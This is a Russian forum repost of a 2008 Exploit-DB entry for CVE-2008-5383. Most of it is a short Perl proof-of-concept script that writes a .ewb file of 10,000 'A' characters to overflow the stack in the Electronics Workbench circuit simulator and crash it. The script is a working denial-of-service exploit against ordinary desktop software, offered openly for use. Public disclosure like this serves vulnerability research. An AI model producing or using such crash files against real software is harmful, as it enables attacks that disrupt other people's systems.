Exploit Electronics Workbench - '.ewb' Local Stack Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
7307
Проверка EDB
  1. Пройдено
Автор
ZIGMA
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2008-5383
Дата публикации
2008-11-30
Код:
#!/usr/local/bin/perl 
#
#
# OOO OOO             OO                            OOO                                
#  O   O               O                           O   O
#  O   O               O                           O   O
#  O   O  OO OO    OOOOO   OOOOO  OOO OO  OOOOOO   O   O  OO OO    OOOOO
#  O   O   OO  O  O    O  O     O   OO  O O   O    O   O   OO  O  O     O
#  O   O   O   O  O    O  OOOOOOO   O        O     O   O   O   O  OOOOOOO
#  O   O   O   O  O    O  O         O       O      O   O   O   O  O
#  O   O   O   O  O    O  O     O   O      O   O   O   O   O   O  O     O
#   OOO   OOO OOO  OOOOOO  OOOOO  OOOOO   OOOOOO    OOO   OOO OOO  OOOOO                                                                                        
#
# [+] Application               : Electronics Workbench
# 
# [+] Application's Description : (" Electronics Workbench sets the standard for affordable simulators.
#                                    The tight integration of its schematic editor, SPICE simulator and
#                                    on-screen waveforms makes what-if scenarios easy and instant.
#                                    The exceptional features of this latest release will come as no
#                                    surprise to our 80,000 previous customers. Value, power and ease of
#                                    use are what Electronics Workbench has always stood for.")
#                                    
# [+] Bug                       : Local .EWB File Stack Buffer Overflow (PoC)
# 
# [+] Author                    : Underz0ne Crew
#                                 Zigma
#
# I just got the program from my Elctronic's professor , Instead of simulating my homework I fuzzed it , I think I m geek :S , whatever 
#
$filename = "fuzz.ewb";

$overflow = "A" x 10000;

print "\n\n[+] Evil file to fuzz : $filename ...\r\n";
sleep(2);

open(ewb, ">./$filename") || die "\nCannot open $filename: $!";

print ewb "$overflow";

close (ewb);

print "\n[+]  file successfully created!\r\n";

# milw0rm.com [2008-11-30]
 
Источник
www.exploit-db.com

Похожие темы